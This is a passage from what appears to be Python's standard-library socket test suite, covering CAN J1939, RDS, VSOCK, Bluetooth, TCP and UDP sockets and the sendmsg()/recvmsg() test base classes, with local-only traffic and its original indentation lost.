socket.J1939_NLA_PAD
socket.J1939_NLA_BYTES_ACKED
socket.J1939_EE_INFO_NONE
socket.J1939_EE_INFO_TX_ABORT
socket.J1939_FILTER_MAX
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testCreateJ1939Socket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
pass
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
addr = self.interface, socket.J1939_NO_NAME, socket.J1939_NO_PGN, socket.J1939_NO_ADDR
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
socket_helper.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, socket_helper.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
@unittest.skipUnless(HAVE_SOCKET_BLUETOOTH,
'Bluetooth sockets required for this test.')
class BasicBluetoothTest(unittest.TestCase):
def testBluetoothConstants(self):
socket.BDADDR_ANY
socket.BDADDR_LOCAL
socket.AF_BLUETOOTH
socket.BTPROTO_RFCOMM
if sys.platform != "win32":
socket.BTPROTO_HCI
socket.SOL_HCI
socket.BTPROTO_L2CAP
if not sys.platform.startswith("freebsd"):
socket.BTPROTO_SCO
def testCreateRfcommSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support L2CAP sockets")
def testCreateL2capSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_L2CAP) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support HCI sockets")
def testCreateHciSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI) as s:
pass
@unittest.skipIf(sys.platform == "win32" or sys.platform.startswith("freebsd"),
"windows and freebsd do not support SCO sockets")
def testCreateScoSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_SCO) as s:
pass
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class BasicUDPLITETest(ThreadedUDPLITESocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPLITESocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDPLITE
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDPLITE
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
